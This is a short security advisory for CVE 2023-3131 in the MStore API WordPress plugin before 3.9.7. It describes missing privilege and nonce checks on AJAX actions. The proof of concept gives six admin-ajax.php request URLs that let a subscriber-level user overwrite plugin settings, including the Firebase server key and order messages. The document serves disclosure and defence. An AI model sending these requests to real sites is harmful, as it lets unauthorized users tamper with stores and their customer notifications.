MStore API < 3.9.7 – Subscriber+ Unauthorized Settings Update | CVE 2023-3131

Description

The plugin does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.

Proof of Concept

Make sure the site also has WooCommerce installed and activated, then, while logged-in as a subscriber, visit the following URLs:

- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit=99
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&serverKey=hacked
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&title=1337
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message=hacked+message
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&title=1338
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&message=hacked+message

Then, while logged-in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin, and notice how the attacks have changed all the values.